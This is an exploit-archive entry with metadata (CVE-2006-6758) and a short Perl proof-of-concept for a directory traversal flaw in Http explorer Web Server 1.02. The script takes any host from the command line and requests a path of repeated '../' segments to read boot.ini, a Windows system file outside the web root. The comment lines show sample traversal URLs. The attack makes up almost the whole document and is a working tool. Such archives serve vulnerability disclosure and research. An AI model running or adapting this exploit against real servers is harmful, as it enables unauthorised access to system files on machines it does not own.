Http explorer Web Server 1.02 - Directory Traversal
Author: str0ke
type: remote
platform: windows
port:
date_added: 2006-12-20
date_updated: 2016-09-21
verified: 1
codes: OSVDB-37388;CVE-2006-6758
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comhttp-explorer-1.02.binary.zip
# Http explorer Web Server 1.02 Directory Transversal Vulnerability
# http://sourceforge.net/projects/http-explorer/
# Test: http://[site]/../../../../ || http://[site]/../
# /str0ke
use LWP::Simple;
use strict;
sub usage
{
print "Http explorer Web Server 1.02 Directory Transversal Vulnerability\n";
print "str0ke (milw0rm.com)\n";
print "Usage: $0 www.example.com\n";
exit ();
}
my $host= shift || &usage;
getprint "http://" . $host . "/../../../../../../../../boot.ini";
# milw0rm.com [2006-12-21]